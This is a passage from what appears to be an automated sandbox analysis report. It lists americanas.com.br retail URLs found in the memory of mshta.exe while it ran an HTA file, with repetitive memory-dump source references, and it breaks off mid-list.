https://www.americanas.com.br/categoria/utilidades-domesticas?chave=dk_hm_at_ud
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menu
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidadesn
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/vale-presente?chave=pfm_home_valepresentes_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/vestuario-esportivo?chave=pfm_home_vestuarioesportivo_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliados
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/black
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfriday
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485974974.0000000009DA2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/celular-5g?chave=pfm_hm_tt_1_0_tecnologia5g
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486722815.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486888120.0000000009DB4000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579924983.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=dk_hm_branding_lojasoficiais
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=dk_hm_branding_lojasoficiaisF
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=prf_hs_0_dt_1_00_lojasoficiais
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509151573.000000000BE37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_ats_2_0_natal24
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509932117.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578843377.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_dt_2_9_natal24
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502389713.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510371736.000000000AB3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577843156.000000000AB4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556953480.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566649661.0000000002E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_tp_1_0_natal24
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_tp_1_0_natal24Ks
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000ABA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 